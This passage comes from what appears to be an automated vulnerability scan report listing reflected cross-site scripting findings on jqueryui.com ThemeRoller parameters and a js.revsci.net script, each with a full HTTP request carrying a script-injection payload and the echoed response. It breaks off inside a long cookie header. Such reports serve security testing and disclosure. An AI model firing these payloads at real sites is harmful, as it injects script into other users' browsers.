This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px7c65d"><script>alert(1)</script>1ac0e87e35d&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px7c65d"><script>alert(1)</script>1ac0e87e35d&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.81. http://jqueryui.com/themeroller/ [opacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d9b9"><script>alert(1)</script>4b8fea3533e was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d9b9"><script>alert(1)</script>4b8fea3533e&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
xtureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d9b9"><script>alert(1)</script>4b8fea3533e&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

2.82. http://jqueryui.com/themeroller/ [opacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 911fc"><script>alert(1)</script>3c6b3b13c15 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30911fc"><script>alert(1)</script>3c6b3b13c15&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30911fc"><script>alert(1)</script>3c6b3b13c15&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.83. http://jqueryui.com/themeroller/ [thicknessShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1d78"><script>alert(1)</script>e9417ff18c was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxb1d78"><script>alert(1)</script>e9417ff18c&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxb1d78"><script>alert(1)</script>e9417ff18c&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.84. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 6da49<script>alert(1)</script>f1f0690e9f was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K087846da49<script>alert(1)</script>f1f0690e9f HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzENbgpj37xX1GlJO7a3wEU0cw3fRauBLbLa1hxIJOjDBlu18gnrOpSO3YjF0wMKV4ipvKrR3EogwrxHeNknjMH6SqUl22pXLAnFTV9qIeZlIZDHhyA0dnb6CwiAhxROt1YH8AVXH8382QGU/vgf98KjcLbIKBY60ENFOM7PSFI0WvHFebNnpD4olAZ8EKv0T8FyPx6DB7zblwlm/kfK0gsDM9HWwjjlpRArVpgdwu7hzWke/0YixMmmj5fRg6bBCx0SlvtbNmqCvsL9F+ThBet19A04HxTqU8b3nQhNZQGPBELixm9ZPLcb0nND8FSs5lEnuFkpXMu9XllQPRKily+32yrrvpvCQ5hdDDws3fRNKu9/VbXaqnftCbneHUzm69ZOZ0bU3GpkV37psEePMvYy5M9A1WMNQTLz3tsX5kfpLytLXUghOOqB/pQnGvlLrG3jR52bk5VGeRrE7ifz9y1n9uuhpUSHstnDVJAhckVdxAf0dhr+BzFueK6tJwy5o358GYKr4ry9mXUxrBhWdfeEgP0zm25Ih8ZAyh2cru1GAXaBOIKDNsQqAbhr4/x0AM3+BVLmPMMY12n3J+s4kc4awJtt7+FQgXo1NPLkMhjUdOAZcvjlggsTUMim918XskWnLFxgCEjyFn5gwnfpprqPLwri12NcuTcWLAKw8g0DdBvoeQgcr66oEHP6hTz2knqS5hfh0KTnj2uAkBw/WcyKvQ0K6mV+ujsqYMntEg3wHxat+ozLZkyYzVmCjTff6Yssgszk+Ln2nBOsMCNsu3grl8/mjf+JrnijOGn0fAJIpAgw5LSKbzNNFIEzolKLS9jsskM78jnojzRjl18iF6JsYngRg42f/OjDM/4XPdH/kiuKqMwT8neptYVN8gAeirQn83vTADE6vJdGN/m2j8Isv5DTBi+BvWFDALDwARgW2CrZCOjRaXOCH+mCDLkyaBfdswb3s8MQGf8OnLkXbgZxht6J0pymsopMR1/erCrDSKhaDjW3dbxj2Ec2ruEnAZ1K16NpPVlZAwGIQOKVna8Eph3bGwiPsyh0aVeLizRyS727aLulAX44yHYtN7pvQycigS4oAVgoexNRjIDXQytUbnNWFYeh1W4CDCtEi/GSzoQB+k1xV4aTQw6qbsH9WFgQsnQZ2p7dtgw1PcRM1q58YfPNexKh9bv3HYj68SoXzfuFseAwDbBWVFoQIV3np8KjOAy/XFT3w8wD3Uk2qoGAqY6jvE5IEg2CETzhFMgAby1SLgECONA+/NiEOpTsefwlKrp4QbyubMrUU8QqWcfpYLQmG7EEAZMaD61U30gLGpyTDz+XTK1Aetxz1XYZ7g1+7zdI+2Jz80HqzHAuVQrwbViu98spWaM0QPlKW5i8JhSI84NTuETOMs4sVoakoTsytqLu/NICBhVKXA9krf692p+28S/XtfL7pe+8ITPA3CXgdnZi3/sVFt5SczdpaBGG3fXkatl1cEkySH37s3Q5QzkvxK0JaT2hRSLjHvQq7V789ZV3A0rtyOhZFIU4m/biU0ASEvJJaC023+ugedPPFcdKly4XIbrT0vHawWP8xdGHsTFgGioYb1WZogmwmjaqZmwUg4TzO1mmsa6k7V+XnsdYiYLp1jN2z3CvCXdYQNY0GbpiIN0MYulPLdp0Qysc4z/0y9NO0uN8KHzT3mWvfthj1Naxji6UD7Fq59FA00aUdvRRrl9Ii2oMu/ZSC31YZhyTl8vy06iSMzRCHhgzGUXTrIr26/AOZ28M3xZjyQx4NbTI9+0/gv1qHeP0D+0GGfIi+c/Hnoj46u05Oz2rfd0IHItCcszLJpVkV7WgbA==; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=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; rsiPus_TE1N="MLsXtTENJApvJ5EkOsXUOAMIrN7cVDsRAI1JlA2+kP2O+rpZrFxjRJpWO95J9jw2ez7PuZwvYpKzPZnmx73e3+g+RBhF6m2qS5qlx6y79pJEUaqR3iscgzeYYjYHE4zarxjYFkAK699GLRvC/lOpNi3oKjSDUjQz6bRd5RumVseON9retzHXthkJz7rmg/AoXcHq/5pWJqRHvxa4sjMtfKPaDQ33n2MzatS1JHKj3inoOBwKFOrUvo8YaYkbDBX35ir0cxEU/FuG0/p0o7qD+/iAZjMCOEMSy6LFwfP/J639cuKKTM9hCsXY7SRInhwCovfpF72sRVZjw87NKbbB5Qql0y6OOGyQHjmdqnB673xTTed/W8l8FYytBOFCjfyyAn+9fAsQpGJACvABUg65KeD2WZxuUkW8tcwRvHrD8CCkEjJAiJaJ82KVgPv/NORGeWc9yQYH8J8DvtXM30s4lrbgRaOIuDlgmpCQPyY96wRUB5WctGJ5ukZ+VdijEsGEXKuAkODAAvCZgyZdj8pk/yhkS0E5DWzwQNhbMQqx9ZcSOd2BRF73UX97YK9Y2LBhI5D5YdW6AxIcxgZ75K3YEm2jyg8wVYiegYI4koi6fjSUGpU/aclERWBbApHsM8wQvxy/xAjqz5YU6sjueUp2EQCgOSizhocs/l635dkgU41sM3QM4vfW+yqPZggnyj4CCBDgYunklnGSR1uUwhJ5hDMoOqLrb5l6iy7ocKWjGp4dHvAEKwJ9W7MtSY1f41qRjmHDNW9/r6Q8aJUKpTJDmtMSHptJB5b7H/DyCI9h2P2Jc53oHYsuhzMyCqTEHsZ1NHiZncWyXVikqCft8J5KWWMaHRDZJ4xrlnYbg9QbfDpW13lV2wfIa5JYPZCAicT6d7jumtyAidZ9MhQT3qWk+vU2eX/ch32cEA3iYr2o27vwbqcnfZMKtZLUqKawF9qclwanTscXsJVIuz+EFY2T/cgVP6dGTkX0PEfzwfQto1hHpBtSU+5CiN7tPVfU3EWnub4+QSFEOUm98aAA9rwkukyqI0H52kYMKTrOExsDgc4HCR3ZpaW/yqUqrkZtHgwrPXhRSgzmUynN1lnLdZIdNR1ojLIOQfdCYDd8YoVzuIGzZBAACC754kxcTZjDmurWrZoeWjI2k4sycb8WveRTIGNS0tCpCEnvVK6DRSZeRPZ94F89r62QMAUaW0jXDnDKORbKBvUUy2WvWoaGLHNMjts8k4qt7Pta2W9Yam9cirruDGatLKblpOHKBcIUQK0tZfcSJIXU/LdkOfqtbzkELtKtuTyGXEnQxPmL98WMjfKPjd9BbcZfBwr+okep4nH+ENdSMYVP/LRqrdQdRIpj3oIsiVfqfv5kuG3oAA0+UypOfQ/LDMyvu1OeQgp7zfqCKAW9gNK3JnMhNNyF2y+GB3/bTOyaIWb9WyJTQ6FZp0Lp4mbDTa0xbsVieWfPhWs1ui+rGo+GHkveFJJKHiuHlJ/yTOvZNAA4cv9yWcaSVCbV9gfI/liUeuPq30bAU6XE+IFUECA8aiAUIfwBYuEgbzMkZpqjj8XvpIGujHXxiCPL"; rsi_us_1000000="pUMFIjmjMAYa1A1HNiNf4aD897fu+6/C9AYxnI+C7nqajjZy/BAe74V9YzefmTopYODsSlf0yPRabejKYU/oSL9Owap6XOeUQ4ciV1tzQfT3iO0MrhrH2lJL6or6DakcL1/R5rlzLW0Pmg4PjyesEXJyespCvzpiydwXlQkz5P+UjuxvsK7zEYNz1svYpqlSkbg3IDw6kcgOe7SNUYJFpFXIyxXgABWM3N3zv8Q1xWtl7iDsYKKkJP5ERoVfGZbiXD4RdCoNYQD91hfjwxGcWkC++FiIFmVpa6Gk1swE0IqnmLypaxfG9gOYWF7NqC6fh1PY5HwirT/IgOnCAMHC0H/kiGEca+FtCA7m9ae2gs4q6CiNOj55Dt1//UlBU/Y3iWVkNjKs/KIv5kg1ZecKuwAYB7vudzrXFDfgCnfjXnu+FYwuhUmF6/VqVS1i9BXbeuzG7kklGFvaKZ5Wx+FB3CsRdvb+a+vAS/Zmwg4p7/oVCzFOf/+pmM41wTvkUzi90tckSUpXsEC+dwnNVzXi6nHZ/F5pNbipO0Li4Rl+1fFEIte+mZ4NmTw6j3NeHooTwXKnk8PyEHLSASgOoUrzxbQXKawd5eqdAiwI1sNzUV8GYgkzyhrpTthweZJtNUV6DgxzVxlrXY+5mc2THvCA+ily4O24gMpBghIbJBbEtCFi91u2CjeoWsO8am9kaTpheByALnVQQhbnvGm+l3g64IgEqCNJe+JAwfccd5IHlfXx4kqV1QLYVS6K6U7XCVZGntQx7NqEFQwh3u21azYppOlv3/vxzR7T8ni2uZTDpndUH+do1MI61OO4x1rUXNKGWaFwhYJPBmGIFvGIxe5PITc9SDxzLkhi7tea6hmj5NgS3UZvJF8WkY/iJim88X7mWWAndpfBjo/k+EC8/OB5JTpn56gPbDMvO0Ws+hbMUhOHyId1s398RsDRTmij83l43RLcVuuETWuLuOPT+JdyEMvMsEn7HcvBF